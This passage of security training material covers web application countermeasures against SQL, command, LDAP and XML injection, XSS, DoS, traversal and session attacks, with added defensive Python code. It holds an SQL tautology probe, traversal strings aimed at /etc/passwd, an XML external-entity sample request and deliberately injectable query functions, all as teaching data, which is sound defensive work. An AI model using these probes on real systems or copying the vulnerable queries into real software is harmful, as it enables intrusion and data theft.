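HTML_ENTITIES = {"<": "&lt;", ">": "&gt;", "&": "&amp;", '"': "&quot;", "'": "&#x27;"}


def url_encode(text):
    """Every byte outside the unreserved set becomes %hh; non-ASCII characters
    are first encoded as UTF-8, which yields the %c2%a9-style sequences in the table."""
    return "".join(ch if ch in UNRESERVED
                   else "".join(f"%{b:02x}" for b in ch.encode("utf-8"))
                   for ch in text)


def html_encode(text):
    """HTML encoding with the named entities above."""
    return "".join(HTML_ENTITIES.get(ch, ch) for ch in text)


def base64_with_bits(data):
    """Base64 of `data` plus the 6-bit groups it was built from, matching the
    'cake' worked example in the table (the final group is zero-padded)."""
    bits = "".join(f"{b:08b}" for b in data)
    groups = [bits[i:i + 6].ljust(6, "0") for i in range(0, len(bits), 6)]
    return base64.b64encode(data).decode("ascii"), groups


def hex_encode(data):
    """Hex encoding: two hex digits per byte."""
    return data.hex()


_PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")
_PCT = re.compile(r"((?:%[0-9a-fA-F]{2})+)")


def decode_once(text):
    """One pass of decoding: %uXXXX (16-bit Unicode form), then runs of %XX
    interpreted as UTF-8 bytes."""
    text = _PCT_U.sub(lambda m: chr(int(m.group(1), 16)), text)

    def _run(m):
        raw = bytes(int(h, 16) for h in m.group(1)[1:].split("%"))
        return raw.decode("utf-8", "replace")

    return _PCT.sub(_run, text)


def canonicalize(text, max_rounds=3):
    """Decode until the value stops changing and return (decoded, rounds).
    Validation must run on the decoded form; rounds > 1 means the input was
    encoded more than once, which is itself worth logging."""
    rounds = 0
    while rounds < max_rounds:
        decoded = decode_once(text)
        if decoded == text:
            break
        text, rounds = decoded, rounds + 1
    return text, rounds
```

`base64_with_bits(b"cake")` returns the Base64 string together with the six-bit groups shown in the table; `canonicalize("%253Cscript%253E")` needs two rounds to reach `<script>`, which is exactly the case a filter that decodes only once would miss.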


How to Defend Against SQL Injection Attacks

• Limit the length of user input
• Use custom error messages
• Monitor DB traffic using an IDS, WAF
• Disable commands like xp_cmdshell
• Isolate database server and web server
• Always use method attribute set to POST
• Run database service account with minimal rights
• Move extended stored procedures to an isolated server
• Use typesafe variables or functions such as IsNumeric() to ensure type safety
• Validate and sanitize user inputs passed to the database
• Use low privileged account for DB connection

How to Defend Against SQL Injection Attacks

To defend against SQL injection attacks, several things have to be taken care of. Unchecked user input should not be allowed to pass into database queries. Every user variable passed to the database should be validated and sanitized. The given input should be checked for the expected data type. User input that is passed to the database should be quoted.

• Limit the length of user input
• Use custom error messages
• Monitor DB traffic using an IDS, WAF
• Disable commands like xp_cmdshell
• Isolate database server and web server
• Always use method attribute set to POST
• Run database service account with minimal rights
• Move extended stored procedures to an isolated server
• Use typesafe variables or functions such as IsNumeric() to ensure type safety
• Validate and sanitize user inputs passed to the database
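The following added example (my own code, not from the courseware, using Python's built-in sqlite3 in place of Microsoft SQL Server) puts the concatenated "before" query beside a parameterized one and adds the three items from the list that can live in application code: a length limit, a numeric type check standing in for IsNumeric(), and a custom error message returned in place of the raw database error. The `users` table, its rows and the 32-character limit are constructed for the demonstration; the low-privileged connection account and xp_cmdshell are server-side settings and are not shown.

```python
import sqlite3


def build_db():
    """Constructed sample data; sqlite3 stands in for the real database server."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (name, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return conn


def lookup_vulnerable(conn, name):
    """'Before': the value is spliced into the statement text, so quote
    characters in it change the query's structure."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


MAX_NAME_LEN = 32  # assumed limit


def lookup_safe(conn, name):
    """'After': length-limited input bound as a parameter; the driver sends it
    as data, never as SQL text."""
    if len(name) > MAX_NAME_LEN:
        raise ValueError("name too long")
    return [row[0] for row in conn.execute(
        "SELECT name FROM users WHERE name = ?", (name,))]


def lookup_by_id(conn, raw_id):
    """Type-safe variant: the IsNumeric()-style check rejects anything that is
    not a plain integer before it gets near the query."""
    if not raw_id.isdigit():
        raise ValueError("id must be numeric")
    return [row[0] for row in conn.execute(
        "SELECT name FROM users WHERE id = ?", (int(raw_id),))]


def handle_request(conn, name):
    """Custom error message: the caller sees a generic failure, not the
    database's own error text (which would describe the schema or the query)."""
    try:
        return {"ok": True, "users": lookup_safe(conn, name)}
    except (ValueError, sqlite3.Error):
        # log the real exception server-side; do not echo it to the client
        return {"ok": False, "error": "The request could not be processed."}
```

With the sample table, `lookup_vulnerable` returns every row when the input carries a quote and an OR clause, while `lookup_safe` with the same input returns nothing, because the whole string is compared as one name.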


How to Defend Against Command Injection Flaws

How to Defend Against Command Injection Flaws

The simplest way to protect against command injection flaws is to avoid them wherever possible. Some language-specific libraries perform identical functions to many shell commands and some system calls. These libraries do not invoke the operating system shell interpreter, and so avoid most shell command problems. For those calls that must still be used, such as calls to backend databases, one must carefully validate the data to ensure that it does not contain malicious content. One can also arrange the various requests in a pattern which ensures that all given parameters are treated as data instead of potentially executable content.

Most system calls, and the use of stored procedures with parameters that accept valid input strings to access a database, or prepared statements, provide significant protection, ensuring that the supplied input is treated as data. This reduces, but does not completely eliminate, the risk involved in these external calls. One can always validate the input to ensure the protection of the application in question. Least privileged accounts must be used to access a database so that there is the smallest possible loophole.

The other strong protection against command injection is to run web applications with only the privileges required to carry out their functions. Therefore, one should avoid running the web server as root, or accessing a database as DBADMIN, or else an attacker may be able to misuse administrative rights. The use of the Java sandbox in the J2EE environment stops the execution of system commands.
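As an added example (my own code, not from the courseware), the Python below shows the pattern the passage recommends: execute the program directly with an argument vector so that no shell interpreter is involved, validate the one user-supplied value against a strict host-name grammar before it is used, and fall back to `shlex.quote` only when a shell string is unavoidable. The host-lookup scenario and the `echo` demonstration are constructed; `ping` is only assembled as an argument vector, never run.

```python
import re
import shlex
import subprocess

# Strict grammar for the one value the user controls (RFC 1123 host names).
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)"
    r"(?:\.(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?))*$")


def validate_hostname(host):
    """Allowlist validation: anything the grammar does not accept is refused,
    so shell metacharacters, spaces and newlines never reach a command at all."""
    if not HOSTNAME.match(host):
        raise ValueError("invalid host name")
    return host


def build_ping_argv(host):
    """Argument vector for a reachability check. Handing a list to the OS means
    the program is executed directly; there is no shell to inject into."""
    return ["ping", "-c", "1", validate_hostname(host)]


def run_argv(argv):
    """execve-style invocation: no shell (shell=False is subprocess's default)."""
    completed = subprocess.run(argv, capture_output=True, text=True, check=False)
    return completed.stdout


def echo_back(user_input):
    """Demonstration with the echo program: metacharacters arrive as literal
    text because nothing interprets them on the way."""
    return run_argv(["echo", user_input]).rstrip("\n")


def shell_string_for(host):
    """Only when a shell string is unavoidable: validate first, then quote, so
    the value is a single word to the shell."""
    return "ping -c 1 " + shlex.quote(validate_hostname(host))
```

The two layers are independent: even if the grammar were looser, the argument-vector call would still pass the value as one argv entry, and even if a shell were required, the validated and quoted value could not terminate the command.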


How to Defend Against XSS Attacks

• Validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification
• Encode input and output and filter meta characters in the input
• Use testing tools extensively during the design phase to eliminate such XSS holes in the application before it goes into use
• Do not always trust websites that use HTTPS when it comes to XSS
• Use a web application firewall to block the execution of malicious script
• Filtering script output can also defeat XSS vulnerabilities by preventing them from being transmitted to users
• Convert all non-alphanumeric characters to HTML character entities before displaying the user input in search engines and forums
• Develop some standard or signing scripts with private and public keys that actually check to ascertain that the script introduced is really authenticated

How to Defend Against XSS Attacks

The following are the defensive techniques to prevent XSS attacks:

• Check and validate all the form fields, hidden fields, headers, cookies, query strings, and all the parameters against a rigorous specification.
• Implement a stringent security policy.
• Web servers, application servers, and web application environments are vulnerable to cross-site scripting. It is hard to identify and remove XSS flaws from web applications. The best way to find flaws is to perform a security review of the code, and search in all the places where input from an HTTP request comes out as output through HTML.
• A variety of different HTML tags can be used to transmit a malicious JavaScript. Nessus, Nikto, and other tools can help to some extent in scanning websites for these flaws. If a vulnerability is discovered in one website, there is a high chance of it being vulnerable to other attacks.
• Filter the script output to defeat XSS vulnerabilities, which can prevent them from being transmitted to users.
• The entire code of the website has to be reviewed if it has to be protected against XSS attacks. The sanity of the code should be checked by reviewing and comparing it against exact specifications. The areas should be checked as follows: the headers, as well as
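The two measures that can be turned directly into code, validating parameters against a rigorous specification and converting every non-alphanumeric character to an HTML entity before output, are shown in the following added example (my own code, not the courseware's). The encoder is applied per output context, which the slide does not spell out: HTML body text and a quoted JavaScript string need different escapes, and the JavaScript variant also neutralises a closing `</script>` inside the value. The `SPEC` parameter grammar and the search-page template are constructed for the example.

```python
import html
import re


def entity_encode_all(text):
    """The slide's rule: every non-alphanumeric character becomes a numeric
    HTML entity, so nothing the user typed can be read as markup."""
    return "".join(ch if (ch.isascii() and ch.isalnum()) else f"&#x{ord(ch):x};"
                   for ch in text)


def encode_for_html_body(text):
    """Minimal encoding for HTML text and attribute values (<, >, &, ", ')."""
    return html.escape(text, quote=True)


def encode_for_js_string(text):
    """For a value placed inside a quoted JavaScript string literal: escape every
    non-alphanumeric character as \\xhh or \\uhhhh. This also breaks up a
    closing script tag inside the value, which the HTML parser would otherwise
    honour regardless of JavaScript quoting."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append(f"\\x{ord(ch):02x}")
        else:
            out.append(f"\\u{ord(ch):04x}")
    return "".join(out)


# Constructed rigorous specification: which parameters may appear at all, and
# the exact grammar each must satisfy.
SPEC = {
    "q": re.compile(r"[\w .\-]{1,64}", re.ASCII),
    "page": re.compile(r"[0-9]{1,4}"),
}


def validate_params(params):
    """Return {name: reason} for every parameter that fails the specification;
    an empty dict means the request may proceed."""
    errors = {}
    for name, value in params.items():
        pattern = SPEC.get(name)
        if pattern is None:
            errors[name] = "unexpected parameter"
        elif not pattern.fullmatch(value):
            errors[name] = "does not match specification"
    return errors


def render_search_page(query):
    """Constructed template that echoes the query in two contexts, each with
    the encoder that context requires."""
    return (f'<p>Results for "{encode_for_html_body(query)}"</p>\n'
            f'<script>var lastQuery = "{encode_for_js_string(query)}";</script>')
```

Validation rejects the request early; encoding is what protects the page when a value that passed validation (or came from somewhere else, such as a database) is written into markup. Both are needed, and the encoder must match the context the value lands in.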


How to Defend Against DoS Attacks

• Configure the firewall to deny external Internet Control Message Protocol (ICMP) traffic access
• Secure the remote administration and connectivity testing
• Prevent use of unnecessary functions such as gets, strcpy, and return addresses from being overwritten, etc.
• Prevent the sensitive information from overwriting
• Perform thorough input validation
• Data processed by the attacker should be stopped from being executed

How to Defend Against DoS Attacks

The following are the various measures that can be adopted to defend against DoS attacks:

• Configure the firewall to deny external Internet Control Message Protocol (ICMP) traffic access.
• Secure the remote administration and connectivity testing.
• Prevent use of unnecessary functions such as gets, strcpy, and return addresses from being overwritten, etc.
• Prevent sensitive information from overwriting.
• Perform thorough input validation.
• Data processed by the attacker should be stopped from being executed.


How to Defend Against Web Services Attacks

• Configure firewalls/IDS systems for a web services anomaly and signature detection
• Configure WSDL Access Control Permissions to grant or deny access to any type of WSDL-based SOAP messages
• Configure firewalls/IDS systems to filter improper SOAP and XML syntax
• Use document-centric authentication credentials that use SAML
• Implement centralized in-line requests and responses schema validation
• Use multiple security credentials such as X.509 Cert, SAML assertions and WS-Security
• Block external references and use pre-fetched content when de-referencing URLs
• Deploy web services-capable firewalls capable of SOAP and ISAPI level filtering
• Maintain and update a secure repository of XML schemas

How to Defend Against Web Services Attacks

To defend against web services attacks, there should be a provision for multiple layers of protection that dynamically enforces legitimate application usage and blocks all known attack paths with or without relying on signature databases. This combination has proven effective in blocking even unknown attacks. Standard HTTP authentication techniques such as digest and SSL client-side certificates can be used for web services as well. Since most models incorporate business-to-business applications, it becomes easier to restrict access to only valid users.

• Configure firewalls/IDSs for a web services anomaly and signature detection.
• Configure WSDL Access Control Permissions to grant or deny access to any type of WSDL-based SOAP messages.
• Configure firewalls/IDS systems to filter improper SOAP and XML syntax.
• Use document-centric authentication credentials that use SAML.
• Implement centralized in-line requests and responses schema validation.
• Use multiple security credentials such as X.509 Cert, SAML assertions, and WS-Security.
• Block external references and use pre-fetched content when de-referencing URLs.
• Deploy web-services-capable firewalls capable of SOAP- and ISAPI-level filtering.
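Three of these items, filtering improper SOAP/XML syntax, in-line schema validation of requests, and blocking external references, can be enforced at the point where a SOAP message is parsed. The following is an added example (my own code, not from the courseware) of such an in-line check written with Python's standard xml.etree parser: it rejects oversized messages and any DTD or entity declaration (the mechanism by which an XML document pulls in external content), confirms a SOAP 1.1 Envelope/Body structure, and validates the single operation in the Body against a constructed allowlist schema. The `GetBalance` operation, its field grammars, the 64 KB limit and the two sample messages are all constructed for the demonstration.

```python
import re
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
MAX_MESSAGE_BYTES = 64 * 1024  # assumed limit

# Constructed allowlist schema: the only operation exposed and the exact
# grammar of each of its fields.
SCHEMA = {
    "GetBalance": {"accountId": r"[0-9]{6,12}", "currency": r"[A-Z]{3}"},
}


class RejectedMessage(ValueError):
    """Raised for anything the in-line check refuses; the caller returns a
    generic SOAP Fault and logs the reason."""


def _local(tag):
    """Strip the namespace from an ElementTree tag ('{ns}Name' -> 'Name')."""
    return tag.rsplit("}", 1)[-1]


def parse_soap_request(raw):
    """Syntax filtering, external-reference blocking and schema validation in one pass."""
    if len(raw) > MAX_MESSAGE_BYTES:
        raise RejectedMessage("message too large")
    # A DTD is the only place an XML document can declare entities, internal
    # (expansion bombs) or external (references to files or URLs): refuse it.
    if b"<!DOCTYPE" in raw or b"<!ENTITY" in raw:
        raise RejectedMessage("DTD and entity declarations are not accepted")
    try:
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        raise RejectedMessage(f"malformed XML: {exc}") from None
    if root.tag != f"{{{SOAP_NS}}}Envelope":
        raise RejectedMessage("not a SOAP 1.1 Envelope")
    body = root.find(f"{{{SOAP_NS}}}Body")
    if body is None or len(body) != 1:
        raise RejectedMessage("Body must contain exactly one operation element")
    operation = body[0]
    name = _local(operation.tag)
    fields = SCHEMA.get(name)
    if fields is None:
        raise RejectedMessage(f"operation not permitted: {name}")
    values = {}
    for child in operation:
        field = _local(child.tag)
        grammar = fields.get(field)
        if grammar is None:
            raise RejectedMessage(f"unexpected element: {field}")
        text = (child.text or "").strip()
        if not re.fullmatch(grammar, text):
            raise RejectedMessage(f"value of {field} does not match schema")
        values[field] = text
    missing = sorted(set(fields) - set(values))
    if missing:
        raise RejectedMessage(f"missing elements: {missing}")
    return name, values


# Constructed sample messages.
GOOD_REQUEST = b"""<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetBalance xmlns="urn:example:bank">
      <accountId>123456789</accountId>
      <currency>USD</currency>
    </GetBalance>
  </soap:Body>
</soap:Envelope>"""

# Same request, but with a DTD that declares an external entity: rejected
# before the parser ever sees the declaration.
EXTERNAL_REF_REQUEST = b"""<?xml version="1.0"?>
<!DOCTYPE GetBalance [<!ENTITY ext SYSTEM "file:///placeholder-external-resource">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetBalance xmlns="urn:example:bank">
      <accountId>&ext;</accountId>
      <currency>USD</currency>
    </GetBalance>
  </soap:Body>
</soap:Envelope>"""
```

Because the schema is an allowlist, an unknown operation, an extra element, a missing element and a value outside its grammar are all refused with the same generic outcome; the specific reason goes to the server log only.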


Web Application Countermeasures

Unvalidated Redirects and Forwards
• Avoid using redirects and forwards
• If destination parameters cannot be avoided, ensure that the supplied value is valid, and authorized for the user

Broken Authentication and Session Management
• Use SSL for all authenticated parts of the application
• Verify whether all the users' identities and credentials are stored in a hashed form
• Never submit session data as part of a GET, POST

Cross-Site Request Forgery
• Log off immediately after using a web application and clear the history
• Do not allow your browser and websites to save login details
• Check the HTTP Referer header and when processing a POST, ignore URL parameters

Insecure Cryptographic Storage
• Do not create or use weak cryptographic algorithms
• Generate encryption keys offline and store them securely
• Ensure that encrypted data stored on disk is not easy to decrypt

Web Application Countermeasures

The following are the various countermeasures that can be adopted for web applications.

Unvalidated Redirects and Forwards

Avoid using redirects and forwards. If destination parameters cannot be avoided, ensure that the supplied value is valid and authorized for the user.

Cross-Site Request Forgery

- Log off immediately after using a web application and clear the history.
- Do not allow your browser and websites to save login details.
- Check the HTTP Referer header and, when processing a POST, ignore URL parameters.

Broken Authentication and Session Management

- Use SSL for all authenticated parts of the application.
- Verify that all users' identities and credentials are stored in a hashed form.
- Never submit session data as part of a GET or POST.
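As an added example (not code from the module), the hashed-credential and session-management items above implemented in Python: credentials are stored as salted PBKDF2 digests, the session cookie is HMAC-signed with an expiry and the client IP (which also realises the cookie timeout and IP-binding points of the Cookie/Session Poisoning countermeasures later in this module), is sent with the Secure and HttpOnly flags, and is never accepted from GET or POST parameters. The server key, the TTL and the token field layout are assumptions of the example.

```python
import hashlib
import hmac
import os
import secrets
import time
from typing import Dict, Optional

# Constructed for this example; a deployment loads the key from protected
# configuration, never from source code.
SERVER_KEY = b"constructed-example-key-rotate-me"
SESSION_TTL_SECONDS = 900      # cookie timeout: 15 minutes of validity
PBKDF2_ROUNDS = 200_000        # raise as hardware allows


def hash_credential(password: str) -> str:
    """Store a salted PBKDF2-HMAC-SHA256 digest, never the password itself."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${digest.hex()}"


def verify_credential(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    algo, rounds, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def issue_session(user_id: str, client_ip: str, now: Optional[float] = None) -> str:
    """Random session id, expiry and client IP, authenticated with an HMAC."""
    if "|" in user_id:
        raise ValueError("user id may not contain the field separator")
    now = time.time() if now is None else now
    expires = int(now) + SESSION_TTL_SECONDS
    payload = f"{secrets.token_hex(16)}|{user_id}|{expires}|{client_ip}"
    mac = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{mac}"


def set_cookie_header(token: str) -> str:
    # Secure: HTTPS only. HttpOnly: invisible to page scripts. SameSite: not sent cross-site.
    return f"Set-Cookie: session={token}; Path=/; Secure; HttpOnly; SameSite=Strict"


def verify_session(token: str, client_ip: str, now: Optional[float] = None) -> Optional[str]:
    """Return the user id only if the token is authentic, unexpired and from the bound IP."""
    now = time.time() if now is None else now
    try:
        sid, user_id, expires, bound_ip, mac = token.split("|")
    except ValueError:
        return None
    expected = hmac.new(SERVER_KEY, f"{sid}|{user_id}|{expires}|{bound_ip}".encode(),
                        hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, mac):
        return None                      # tampered, e.g. a poisoned user id
    if now >= int(expires):
        return None                      # timed out
    if bound_ip != client_ip:
        return None                      # replayed from another address
    return user_id


def session_from_request(cookies: Dict[str, str], query: Dict[str, str],
                         form: Dict[str, str]) -> Optional[str]:
    """Accept the session only from the cookie jar.

    A token arriving in a URL or form parameter is refused outright: URLs end up
    in logs, browser history and Referer headers, so session data never belongs there.
    """
    if "session" in query or "session" in form:
        return None
    return cookies.get("session")
```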


Web Application Countermeasures (Cont'd)

Insufficient Transport Layer Protection
- Non-SSL requests to web pages should be redirected to the SSL page
- Set the 'secure' flag on all sensitive cookies
- Configure SSL provider to support only strong algorithms
- Ensure the certificate is valid, not expired, and matches all domains used by the site
- Backend and other connections should also use SSL or other encryption technologies

Directory Traversal
- Define access rights to the protected areas of the website
- Apply checks/hot fixes that prevent the exploitation of the vulnerability such as Unicode to affect the directory traversal
- Web servers should be updated with security patches in a timely manner

Cookie/Session Poisoning
- Do not store plain text or weakly encrypted password in a cookie
- Implement cookie's timeout
- Cookie's authentication credentials should be associated with an IP address
- Make logout functions available


Web Application Countermeasures (Cont'd)

The following are the various countermeasures that can be adopted for web applications.

Insufficient Transport Layer Protection

- Non-SSL requests to web pages should be redirected to the SSL page.
- Set the 'secure' flag on all sensitive cookies.
- Configure the SSL provider to support only strong algorithms.
- Ensure the certificate is valid, not expired, and matches all domains used by the site.
- Backend and other connections should also use SSL or other encryption technologies.

Directory Traversal

- Define access rights to the protected areas of the website.
- Apply checks/hot fixes that prevent exploitation of the vulnerability, such as Unicode-encoded path sequences used to perform directory traversal.
- Web servers should be updated with security patches in a timely manner.
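The following added example (not the module's code) shows one way to implement the directory traversal checks above in Python: repeated percent-decoding, Unicode NFKC normalisation so encoded or look-alike dot sequences are seen as "..", containment of the resolved path within the web root, and denial of access to protected areas. The PROTECTED_AREAS set, the web root name and the sample requests are constructed for the example.

```python
import unicodedata
from pathlib import Path
from typing import Dict
from urllib.parse import unquote

# Constructed: directories under the web root that must never be served directly.
PROTECTED_AREAS = {"config", "includes"}
MAX_DECODE_ROUNDS = 3


class TraversalAttempt(ValueError):
    """Raised for any request that would leave the web root or enter a protected area."""


def resolve_under_root(root: Path, requested: str) -> Path:
    """Map a user-supplied path onto a file strictly inside `root`.

    Percent-decoding is repeated because double-encoded sequences (%252e) only
    reveal '..' after a second pass. NFKC normalisation folds full-width and
    other compatibility look-alikes of '.' and '/' into their ASCII forms so the
    parent-directory check sees them.
    """
    text = requested
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    if unquote(text) != text:
        raise TraversalAttempt("too many encoding layers")
    text = unicodedata.normalize("NFKC", text)
    if "\x00" in text:
        raise TraversalAttempt("NUL byte in path")
    text = text.replace("\\", "/")              # treat Windows separators like '/'
    if ".." in text.split("/"):
        raise TraversalAttempt("parent-directory reference")
    root_real = root.resolve()
    # resolve() also follows symlinks, so a link pointing outside the root is caught.
    candidate = (root_real / text.lstrip("/")).resolve()
    if candidate != root_real and root_real not in candidate.parents:
        raise TraversalAttempt("path escapes the web root")
    relative = candidate.relative_to(root_real)
    if relative.parts and relative.parts[0] in PROTECTED_AREAS:
        raise TraversalAttempt("protected area")
    return candidate


# Constructed requests with the verdict the resolver should reach.
SAMPLE_REQUESTS = {
    "css/site.css": "ok",
    "css/./site.css": "ok",
    "../../etc/passwd": "blocked",
    "%2e%2e/%2e%2e/etc/passwd": "blocked",              # percent-encoded dots
    "%252e%252e/etc/passwd": "blocked",                 # double-encoded
    "\uff0e\uff0e/\uff0e\uff0e/etc/passwd": "blocked",  # full-width dots (Unicode)
    "..\\..\\windows\\win.ini": "blocked",              # backslash separators
    "css/site.css%00.png": "blocked",                   # NUL byte truncation
    "config/db.ini": "blocked",                         # protected area
}


def classify(root: Path, requested: str) -> str:
    try:
        resolve_under_root(root, requested)
        return "ok"
    except TraversalAttempt:
        return "blocked"


def run_samples(root: Path = Path("constructed_webroot")) -> Dict[str, str]:
    """Classify every sample request against a (constructed, need not exist) web root."""
    return {request: classify(root, request) for request in SAMPLE_REQUESTS}
```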


Web Application Countermeasures (Cont'd)

Security Misconfiguration
- Configure all security mechanisms and turn off all unused services
- Setup roles, permissions, and accounts and disable all default accounts or change their default passwords
- Scan for latest security vulnerabilities and apply the latest security patches
- Perform dynamic testing and source code analysis

LDAP Injection Attack
- Perform type, pattern, and domain value validation on all input data
- Make LDAP filter as specific as possible
- Validate and restrict the amount of data returned to the user
- Implement tight access control on the data in the LDAP directory

File Injection Attack
- Strongly validate user input
- Consider implementing a chroot jail
- PHP: Disable allow_url_fopen and allow_url_include in php.ini
- PHP: Disable register_globals and use E_STRICT to find uninitialized variables
- PHP: Ensure that all file and streams functions (stream_*) are carefully vetted


Web Application Countermeasures (Cont'd)

The following are the various countermeasures that can be adopted for web applications.

Security Misconfiguration

- Configure all security mechanisms and turn off all unused services.
- Set up roles, permissions, and accounts, and disable all default accounts or change their default passwords.
- Scan for the latest security vulnerabilities and apply the latest security patches.

LDAP Injection Attacks

- Perform type, pattern, and domain value validation on all input data.
- Make LDAP filters as specific as possible.
- Validate and restrict the amount of data returned to the user.
- Implement tight access control on the data in the LDAP directory.
- Perform dynamic testing and source code analysis.
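An added Python example (not part of the module) of the LDAP injection countermeasures just listed: type and pattern validation of each searchable attribute before a filter is built, RFC 4515 escaping of the value as defence in depth, a filter constrained to exactly one attribute and object class, and a cap on the entries and attributes returned to the user. The attribute rules, the object class and the returned-attribute list are assumptions of the example.

```python
import re
from typing import Dict, List, Optional

# Constructed per-attribute rules. Validation happens before any value reaches a
# filter; the patterns deliberately admit none of the filter metacharacters ( ) * \.
ATTRIBUTE_RULES = {
    "uid": re.compile(r"[a-z][a-z0-9._-]{0,31}"),
    "mail": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+"),
    "employeeNumber": re.compile(r"[0-9]{1,8}"),
}
# Only these attributes are ever handed back to the requesting user.
RETURNED_ATTRIBUTES = ("cn", "mail")
MAX_RESULTS = 1  # a lookup by unique identifier should yield at most one entry

# RFC 4515 escapes for characters that carry meaning inside an assertion value.
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape a value for safe inclusion in an LDAP search filter."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_lookup_filter(attribute: str, value: str) -> str:
    """Build the most specific filter possible for one attribute/value pair.

    Raises ValueError when the attribute is not searchable or the value fails its
    pattern check; escaping is applied anyway so a future looser pattern cannot
    turn the value into filter syntax.
    """
    rule = ATTRIBUTE_RULES.get(attribute)
    if rule is None:
        raise ValueError(f"attribute {attribute!r} is not searchable")
    if not rule.fullmatch(value):
        raise ValueError(f"value for {attribute!r} fails validation")
    return f"(&(objectClass=inetOrgPerson)({attribute}={escape_filter_value(value)}))"


def try_build(attribute: str, value: str) -> Optional[str]:
    """Convenience wrapper: the filter, or None when the input is rejected."""
    try:
        return build_lookup_filter(attribute, value)
    except ValueError:
        return None


def restrict_results(entries: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Cap the number of entries and strip every attribute the user may not see."""
    return [{k: v for k, v in entry.items() if k in RETURNED_ATTRIBUTES}
            for entry in entries[:MAX_RESULTS]]
```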


How to Defend Against Web Application Attacks

[Diagram: defenses mapped to the components they protect: Operating System, LDAP Server (make LDAP filter as specific as possible), Custom Error Page]


How to Defend Against Web Application Attacks

To defend against web application attacks, you can follow the countermeasures stated previously. To protect the web server, you can use a WAF, a firewall/IDS, and packet filtering. You need to constantly update the software with patches to keep the server up to date and to protect it from attackers. Sanitize and filter user input, analyze the source code for SQL injection, and minimize the use of third-party applications to protect the web applications. You can also use stored procedures and parameterized queries to retrieve data, disable verbose error messages, which can guide the attacker with useful information, and use custom error pages instead. To avoid SQL injection into the database, connect using a non-privileged account and grant least privileges to the database, tables, and columns. Disable commands like xp_cmdshell, which can affect the OS of the system.
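As an added example (not from the module), the SQL-related defenses above in Python with sqlite3: a concatenated query beside its parameterised replacement, a wrapper that shows the user only a generic error page while the verbose detail goes to the server log, and, for reference only, the T-SQL a DBA would run to grant least privilege and disable xp_cmdshell. The table, the accounts and the log are constructed for the example.

```python
import secrets
import sqlite3
from typing import Dict, List

SERVER_LOG: List[str] = []  # stands in for the server-side error log

# Reference only (T-SQL, not executed here): run the application as a
# low-privilege login and switch off the OS command shell procedure.
LEAST_PRIVILEGE_TSQL = """
CREATE USER app_reader FOR LOGIN app_reader;
GRANT SELECT ON dbo.users TO app_reader;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
"""

GENERIC_ERROR = "The request could not be completed. Reference ID: {ref}"


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a customer database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (username, email) VALUES (?, ?)",
                     [("alice", "alice@example.test"), ("bob", "bob@example.test")])
    return conn


def lookup_email_vulnerable(conn: sqlite3.Connection, username: str) -> List[str]:
    # Concatenation lets user-controlled text become part of the query's grammar.
    sql = "SELECT email FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_email_safe(conn: sqlite3.Connection, username: str) -> List[str]:
    # The value travels as a bound parameter and is only ever compared as data.
    rows = conn.execute("SELECT email FROM users WHERE username = ?", (username,))
    return [row[0] for row in rows]


def handle_lookup(conn: sqlite3.Connection, username: str) -> Dict[str, object]:
    """Application-layer wrapper: generic error page to the user, detail to the log."""
    try:
        return {"ok": True, "emails": lookup_email_safe(conn, username)}
    except sqlite3.Error as exc:
        ref = secrets.token_hex(4)
        SERVER_LOG.append(f"{ref} sqlite3 error: {exc}")   # verbose detail stays server-side
        return {"ok": False, "message": GENERIC_ERROR.format(ref=ref)}


def demo() -> Dict[str, object]:
    """Run both lookups against the constructed table and exercise the error path."""
    conn = build_demo_db()
    probe = "x' OR '1'='1"          # the textbook tautology the module warns about
    results: Dict[str, object] = {
        "vulnerable_normal": lookup_email_vulnerable(conn, "alice"),
        "vulnerable_probe": sorted(lookup_email_vulnerable(conn, probe)),
        "safe_probe": lookup_email_safe(conn, probe),
        "wrapped_ok": handle_lookup(conn, "bob"),
    }
    conn.close()
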